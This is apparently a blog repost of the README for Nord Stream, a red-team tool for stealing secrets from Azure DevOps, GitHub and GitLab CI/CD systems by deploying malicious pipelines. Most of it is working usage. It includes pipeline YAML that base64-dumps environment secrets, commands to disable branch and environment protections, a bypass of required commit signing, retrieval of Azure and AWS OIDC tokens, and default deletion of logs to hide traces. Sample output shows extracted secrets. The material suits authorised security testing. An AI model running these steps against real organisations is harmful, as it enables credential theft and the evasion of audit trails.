Exploitation Tools

Nord Stream – Uncovering Secrets With A CICD Exploitation Toolkit

Nord Stream is a tool that allows you extract secrets stored inside CI/CD environments by deploying malicious pipelines.

It currently supports Azure DevOps, GitHub and GitLab.

Table Of Contents

Installation

$ pip3 install -r requirements.txt

git is also required and must exist in your PATH.

Usage

General Usage

Describe Token

The --describe-token option can be used to display general information about your token:$ nord-stream.py github –token “$PAT” –describe-token [*] Token information: – Login: CICD – IsAdmin: False – Id: 1337 – Bio: None

Build YAML

The --build-yaml option can be used to create a pipeline file without deploying it.

It retrieves the various secret names to build the associated pipeline, which can be used to add custom steps:$ nord-stream.py github –token “$PAT” –org Synacktiv –repo TestCICD –env PROD –build-yaml custom.yml [+] YAML file: name: GitHub Actions ‘on’: push jobs: init: runs-on: ubuntu-latest steps: – run: env -0 | awk -v RS=’\0′ ‘/^secret_/ {print $0}’ | base64 -w0 | base64 -w0 name: command env: secret_PROD_SECRET: ${{secrets.PROD_SECRET}} environment: PROD

YAML

The --yaml option can be used to deploy a custom pipeline:name: GitHub Actions ‘on’: push jobs: init: runs-on: ubuntu-latest steps: – run: echo “Hello from step 1” name: step 1 – run: echo “Doing some important stuff here” name: command – run: echo “Hello from last step ” name: last step$ nord-stream.py github –token “$PAT” –org Synacktiv –repo TestCICD –yaml custom.yml [+] “synacktiv/TestCICD” [*] No branch protection rule found on “dev_remote_ea5Eu/test/v1″branch [*] Running custom workflow: …/custom.yml [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated.

[+] Workflow output: 2023-07-18T20:08:33.0073670Z ##[group]Run echo “Doing some important stuff here” 2023-07-18T20:08:33.0074247Z echo “Doing some important stuff here” 2023-07-18T20:08:33.0136846Z shell: /usr/bin/bash -e {0} 2023-07-18T20:08:33.0137261Z ##[endgroup] 2023-07-18T20:08:33.0422019Z Doing some important stuff here [*] Cleaning logs. [*] Check output: …/nord-stream-logs/github

By default, it will display the output of the task named command of the init job, but everything is stored locally and can be access manually:$ cat nord-stream-logs/github/synacktiv/TestCICD/workflow_custom_2023-07-18_22-08-44/init/4_last\ step.txt 2023-07-18T20:08:33.0458509Z ##[group]Run echo “Hello from last step ” 2023-07-18T20:08:33.0459084Z echo “Hello from last step ” 2023-07-18T20:08:33.0511473Z shell: /usr/bin/bash -e {0} 2023-07-18T20:08:33.0511890Z ##[endgroup] 2023-07-18T20:08:33.0597853Z Hello from last step

Clean Logs

By default, Nord Stream will attempt to remove traces left after a pipeline deployment, depending on your privileges. To preserve traces, the --no-clean option can be used.

This will keep the pipeline logs, but this will still revert the changes made to the repository. Note that for GitLab, some traces cannot be deleted.

Signing Commits

Repository administrators can enforce required commit signing on a branch to block all commits that are not signed and verified. With Nord Stream it’s possible to sign commit to bypass such protection.

First create an import your GPG key on the SCM platform.$ gpg –full-generate-key $ gpg –armor –export F94496913C43EFC5 $ gpg –list-secret-keys –keyid-format=long sec dsa2048/F94496913C43EFC5 2023-07-18 [SC] [expires: 2023-07-23] Key fingerprint = B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5 uid [ultimate] test-gpg <test.gpg@cicd.local>$ nord-stream.py github –token “$PAT” –org Synacktiv –repo TestCICD –branch-name main –key-id F94496913C43EFC5 –user test-gpg –email test.gpg@cicd.local –force [*] Using branch: “main” [+] “synacktiv/TestCICD” [*] Getting secrets from environment: “prod” (synacktiv/TestCICD) [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated.

[+] Secrets: secret_PROD_SECRET=my PROD_SECRET $ git verify-commit 00dcd856624bc9a41f8bd70662f0650839730973 gpg: Signature made Tue 18 Jul 2023 10:34:18 PM CEST gpg: using DSA key B1583F439899C5A3B74ED04BF94496913C43EFC5 gpg: Good signature from “test-gpg <test.gpg@cicd.local>” [ultimate] Primary key fingerprint: B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5

Azure DevOps

Nord Stream can extract the following types of secrets:

  • Variable groups
  • Secure files
  • Service connections

Service Connections

Azure DevOps offers the possibility to create connections with external and remote services for executing tasks in a job. To do so, service connections are used.

A service connection holds credentials for an identity to a remote service. There are multiple types of service connections in Azure DevOps.

Nord Stream currently support secret extraction for the following types of service connection:

  • AzureRM
  • GitHub
  • AWS

If you come across a non-supported type, please open an issue or make a pull request 🙂

Help

$ python3 nord-stream.py devops -h
CICD pipeline exploitation tool

Usage:
    nord-stream.py devops [options] --token <pat> --org <org> [--project <project> --no-vg --no-gh --no-az --no-aws --write-filter --no-clean --branch-name <name> --pipeline-name <name> --repo-name <name> (--key-id <id> --user <user> --email <email>)]
    nord-stream.py devops [options] --token <pat> --org <org> --yaml <yaml> --project <project> [--write-filter --no-clean --branch-name <name> --pipeline-name <name> --repo-name <name> (--key-id <id> --user <user> --email <email>)]
    nord-stream.py devops [options] --token <pat> --org <org> --build-yaml <output> --build-type <type>
    nord-stream.py devops [options] --token <pat> --org <org> --clean-logs [--project <project>]
    nord-stream.py devops [options] --token <pat> --org <org> --list-projects [--write-filter]
    nord-stream.py devops [options] --token <pat> --org <org> --list-secrets [--project <project> --write-filter]
    nord-stream.py devops [options] --token <pat> --org <org> --describe-token

Options:
    -h --help                               Show this screen.
    --version                               Show version.
    -v, --verbose                           Verbose mode
    -d, --debug                             Debug mode
    --output-dir <dir>                      Output directory for logs

Signing:
    --key-id <id>                           GPG primary key ID
    --user <user>                           User used to sign commits
    --email <email>                         Email address used to sign commits

args
    --token <pat>                           Azure DevOps personal token
    --org <org>                             Org name
    -p, --project <project>                 Run on selected project (can be a file)
    -y, --yaml <yaml>                       Run arbitrary job
    --clean-logs                            Delete all pipeline created by this tool. This operation is done by default but can be manually triggered.
    --no-clean                              Don't clean pipeline logs (default false)
    --no-vg                                 Don't extract variable groups secrets
    --no-sf                                 Don't extract secure files
    --no-gh                                 Don't extract GitHub service connection secrets
    --no-az                                 Don't extract Azure service connection secrets
    --no-aws                                Don't extract AWS service connection secrets
    --list-projects                         List all projects.
    --list-secrets                          List all secrets.
    --write-filter                          Filter projects where current user has write or admin access.
    --build-yaml <output>                   Create a pipeline yaml file with default configuration.
    --build-type <type>                     Type used to generate the yaml file can be: default, azurerm, github, aws
    --describe-token                        Display information on the token
    --branch-name <name>                    Use specific branch name for deployment.
    --pipeline-name <name>                  Use pipeline for deployment.
    --repo-name <name>                      Use specific repo for deployment.

Examples:
    List all secrets from all projects
    $ nord-stream.py devops --token "$PAT" --org myorg --list-secrets

    Dump all secrets from all projects
    $ nord-stream.py devops --token "$PAT" --org myorg

Authors: @hugow @0hexit

GitHub

List Protections

The --list-protections option can be used to list the protections applied to a branch and to environments:$ nord-stream.py github –token “$PAT” –org Synacktiv –repo TestCICD –branch-name main –list-protections [*] Using branch: “main” [*] Checking security: “synacktiv/TestCICD” [*] Found branch protection rule on “main” branch [*] Branch protections: – enforce admins: True – block creations: True – required signatures: True – allow force pushes: False – allow deletions: False – required pull request reviews: False – required linear history: False – required conversation resolution: False – lock branch: False – allow fork syncing: False [*] Environment protection for: “DEV”: – deployment branch policy: custom [*] No environment protection rule found for: “INT” [*] Environment protection for: “PROD”: – deployment branch policy: custom

Depending on your permissions, you can have less information, only administrators can have the full details of the protections.

Disable Protections

The --disable-protections option can be used to temporarily disable the protections applied to a branch or an environment, realize the dump and restore all the protections:$ nord-stream.py github –token “$PAT” –org Synacktiv –repo TestCICD –branch-name main –no-repo –no-org –env prod –disable-protections [*] Using branch: “main” [+] “synacktiv/TestCICD” [*] Found branch protection rule on “main” branch […] [!] Removing branch protection, wait until it’s restored. [*] Getting secrets from environment: “prod” (synacktiv/TestCICD) [*] Environment protection for: “PROD”: – deployment branch policy: custom [!] Modifying env protection, wait until it’s restored. [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [!] Restoring env protections. [+] Secrets: secret_PROD_SECRET=my PROD_SECRET [*] Cleaning logs. [!] Restoring branch protection.

This requires admin privileges.

Force

By default, if Nord Stream detect a protection on a branch or on an environment it won’t perform the secret extraction.

If you think that the protections are too permissive or can be bypassed with your privileges, the --force option can be used to deploy the pipeline regardless of protections.

Azure OIDC

OIDC (OpenID Connect) can be used to connect to cloud services. The general idea is to allow authorized pipelines or workflows to get short-lived access tokens directly from a cloud provider, without involving any static secrets.

Authorization is based on trust relationships configured on the cloud provider’s side and being conditioned by the origin of the pipeline or workflow.

Here is an example of a GitHub workflow using OIDC:[…] steps: – name: OIDC Login to Azure Public Cloud uses: azure/login@v1 with: client-id: ${{ secrets.AZURE_CLIENT_ID }} tenant-id: ${{ secrets.AZURE_TENANT_ID }} subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }} # this can be optional

If you come across such a workflow, this means that the repository might be configured to get a short-lived access token that can give you access to Azure resources.

Nord Stream is able to deploy a pipeline to retrieve such access token with the following options:$ nord-stream.py github –token “$PAT” –org Synacktiv –repo TestCICD –branch-name main –azure-client-id 65cd6002-25b9-11ee-88ac-7f80b19430c2 –azure-tenant-id 65cd6002-25b9-11ee-88ac-7f80b19430c2 [*] Using branch: “main” [+] “synacktiv/TestCICD” [*] No branch protection rule found on “main” branch [*] Running OIDC Azure access tokens generation workflow [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] OIDC access tokens: Access token to use with Azure Resource Manager API: { “accessToken”: “eyJ0eXAiOiJK[…]PVig”, “expiresOn”: “2023-07-18 23:18:57.000000”, “subscription”: “65cd6002-25b9-11ee-88ac-7f80b19430c2”, “tenant”: “65cd6002-25b9-11ee-88ac-7f80b19430c2”, “tokenType”: “Bearer” } Access token to use with MS Graph API: { “accessToken”: “eyJ0eXAi[…]_qTA”, “expiresOn”: “2023-07-19 22:18:59.000000”, “subscription”: “65cd6002-25b9-11ee-88ac-7f80b19430c2”, “tenant”: “65cd6002-25b9-11ee-88ac-7f80b19430c2”, “tokenType”: “Bearer” }

The --azure-subscription-id is optional and can be used to get an access token for a specific subscription.

AWS OIDC

The same technique (see Azure OIDC) can be used to get a session token on AWS.

Here is an example of a workflow using AWS OIDC:[…] steps: – name: Configure AWS Credentials uses: aws-actions/configure-aws-credentials@v1 with: role-to-assume: arn:aws:iam::133333333337:role/S3Access/CustomRole role-session-name: oidcrolesession aws-region: us-east-1

If you come across such a workflow, this means that the repository might be configured to get an AWS access token that can give you access to AWS resources.

Nord Stream is able to deploy a pipeline to retrieve such access token with the following options:$ nord-stream.py github –token “$PAT” –org Synacktiv –repo TestCICD –aws-role ‘arn:aws:iam::133333333337:role/S3Access/CustomRole’ –aws-region us-east-1 –force [+] “Synacktiv/TestCICD” [*] Running OIDC AWS credentials generation workflow [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] OIDC credentials: AWS_DEFAULT_REGION=us-east-1 AWS_SESSION_TOKEN=IQoJb3[…]KMs0/QB6 AWS_REGION=us-east-1 AWS_ACCESS_KEY_ID=ASIA5ABC8XDMAP2ANNWO AWS_SECRET_ACCESS_KEY=7KJLCjdJKqlpLKDAI9F7SH6SjSQBX68Sjm13xXDA

Help

$ python3 nord-stream.py github -h
CICD pipeline exploitation tool

Usage:
    nord-stream.py github [options] --token <ghp> --org <org> [--repo <repo> --no-repo --no-env --no-org --env <env> --disable-protections --branch-name <name> --no-clean (--key-id <id> --user <user> --email <email>)]
    nord-stream.py github [options] --token <ghp> --org <org> --yaml <yaml> --repo <repo> [--env <env> --disable-protections --branch-name <name> --no-clean (--key-id <id> --user <user> --email <email>)]
    nord-stream.py github [options] --token <ghp> --org <org> ([--clean-logs] [--clean-branch-policy]) [--repo <repo> --branch-name <name>]
    nord-stream.py github [options] --token <ghp> --org <org> --build-yaml <filename> --repo <repo> [--env <env>]
    nord-stream.py github [options] --token <ghp> --org <org> --azure-tenant-id <tenant> --azure-client-id <client> [--azure-subscription-id <subscription> --repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
    nord-stream.py github [options] --token <ghp> --org <org> --aws-role <role> --aws-region <region> [--repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
    nord-stream.py github [options] --token <ghp> --org <org> --list-protections [--repo <repo> --branch-name <name> --disable-protections (--key-id <id> --user <user> --email <email>)]
    nord-stream.py github [options] --token <ghp> --org <org> --list-secrets [--repo <repo> --no-repo --no-env --no-org]
    nord-stream.py github [options] --token <ghp> [--org <org>] --list-repos [--write-filter]
    nord-stream.py github [options] --token <ghp> --describe-token

Options:
    -h --help                               Show this screen.
    --version                               Show version.
    -v, --verbose                           Verbose mode
    -d, --debug                             Debug mode
    --output-dir <dir>                      Output directory for logs

Signing:
    --key-id <id>                           GPG primary key ID
    --user <user>                           User used to sign commits
    --email <email>                         Email address used to sign commits

args
    --token <ghp>                           Github personal token
    --org <org>                             Org name
    -r, --repo <repo>                       Run on selected repo (can be a file)
    -y, --yaml <yaml>                       Run arbitrary job
    --clean-logs                            Delete all logs created by this tool. This operation is done by default but can be manually triggered.
    --no-clean                              Don't clean workflow logs (default false)
    --clean-branch-policy                   Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered.
    --build-yaml <filename>                 Create a pipeline yaml file with all secrets.
    --env <env>                             Specify env for the yaml file creation.
    --no-repo                               Don't extract repo secrets.
    --no-env                                Don't extract environnments secrets.
    --no-org                                Don't extract organization secrets.
    --azure-tenant-id <tenant>              Identifier of the Azure tenant associated with the application having federated credentials (OIDC related).
    --azure-subscription-id <subscription>  Identifier of the Azure subscription associated with the application having federated credentials (OIDC related).
    --azure-client-id <client>              Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related).
    --aws-role <role>                       AWS role to assume (OIDC related).
    --aws-region <region>                   AWS region (OIDC related).
    --list-protections                      List all protections.
    --list-repos                            List all repos.
    --list-secrets                          List all secrets.
    --disable-protections                   Disable the branch protection rules (needs admin rights)
    --write-filter                          Filter repo where current user has write or admin access.
    --force                                 Don't check environment and branch protections.
    --branch-name <name>                    Use specific branch name for deployment.
    --describe-token                        Display information on the token

Examples:
    List all secrets from all repositories
    $ nord-stream.py github --token "$GHP" --org myorg --list-secrets

    Dump all secrets from all repositories and try to disable branch protections
    $ nord-stream.py github --token "$GHP" --org myorg --disable-protections

Authors: @hugow @0hexit

GitLab

As described in the article, there is no way to remove the logs in the activity tab after a pipeline deployment. This must be taken into account during Red Team engagements.

List Secrets

The --list-secrets option can be used to list and extract secrets from GitLab.

The way in which GitLab manages secrets is a bit different from Azure DevOps and GitHub action. With admin access to a project, group or even admin access on the GitLab instance, it is possible to extract all the CI/CD variables that are defined without deploying any pipeline.

From a low privilege user however, it is not possible to list the secrets that are defined at the project / group or instance levels.

However, if users have write privileges over a project, they will be able to deploy a malicious pipeline to exfiltrate the environment variables exposing the CI/CD variables.

This means that a low privilege user has no mean to know if a secret is defined in a specific project. The only way is to look at legitimate pipelines that are already present in a project and check if a pipeline uses sensitive environment variables.

Here is a pipeline file to perform this operation on GitLab:stages: – synacktiv deploy-production: image: ubuntu:latest stage: synacktiv script: – env | base64 -w0 | base64 -w 0

GitLab also support secure files like Azure DevOps. Secure files are defined at the project level. Like the variables It’s not possible to list the secure files without admin access to the project. However, with admin access nord-stream will try to exfiltrate the secure files related to the projects.

YAML

Same as YAML, however you need to provide the full project path like this:$ nord-stream.py gitlab –token “$PAT” –url https://gitlab.corp.local –project ‘group/projectname’ –yaml ci.yml

The output of the command --list-projects returns such path.

List Protections

Same as GitHub list protections

Help

$ python3 nord-stream.py gitlab -h
CICD pipeline exploitation tool

Usage:
    nord-stream.py gitlab [options] --token <pat> (--list-secrets | --list-protections) [--project <project> --group <group> --no-project --no-group --no-instance --write-filter]
    nord-stream.py gitlab [options] --token <pat> ( --list-groups | --list-projects ) [--project <project> --group <group> --write-filter]
    nord-stream.py gitlab [options] --token <pat> --yaml <yaml> --project <project> [--no-clean (--key-id <id> --user <user> --email <email>)]
    nord-stream.py gitlab [options] --token <pat> --clean-logs [--project <project>]
    nord-stream.py gitlab [options] --token <pat> --describe-token

Options:
    -h --help                               Show this screen.
    --version                               Show version.
    -v, --verbose                           Verbose mode
    -d, --debug                             Debug mode
    --output-dir <dir>                      Output directory for logs
    --url <gitlab_url>                      Gitlab URL [default: https://gitlab.com]

Signing:
    --key-id <id>                           GPG primary key ID
    --user <user>                           User used to sign commits
    --email <email>                         Email address used to sign commits

args
    --token <pat>                           GitLab personal token
    --project <project>                     Run on selected project (can be a file)
    --group <group>                         Run on selected group (can be a file)
    --list-secrets                          List all secrets.
    --list-protections                      List branch protection rules.
    --list-projects                         List all projects.
    --list-groups                           List all groups.
    --write-filter                          Filter repo where current user has developer access or more.
    --no-project                            Don't extract project secrets.
    --no-group                              Don't extract group secrets.
    --no-instance                           Don't extract instance secrets.
    -y, --yaml <yaml>                       Run arbitrary job
    --branch-name <name>                    Use specific branch name for deployment.
    --clean-logs                            Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered.
    --no-clean                              Don't clean pipeline logs (default false)
    --describe-token                        Display information on the token

Examples:
    Dump all secrets
    $ nord-stream.py gitlab --token "$TOKEN" --url https://gitlab.local --list-secrets

    Deploy the custom pipeline on the master branch
    $ nord-stream.py gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch master --project 'group/projectname'

Authors: @hugow @0hexit
Tamil S

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

Recent Posts

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

2 weeks ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

3 weeks ago

Red Team Certification – A Comprehensive Guide To Advancing In Cybersecurity Operations

Embark on the journey of becoming a certified Red Team professional with our definitive guide.…

3 weeks ago

CVE-2024-5836 / CVE-2024-6778 : Chromium Sandbox Escape via Extension Exploits

This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…

4 weeks ago

Rust BOFs – Unlocking New Potentials In Cobalt Strike

This took me like 4 days (+2 days for an update), but I got it…

4 weeks ago

MaLDAPtive – Pioneering LDAP SearchFilter Parsing And Security Framework

MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…

4 weeks ago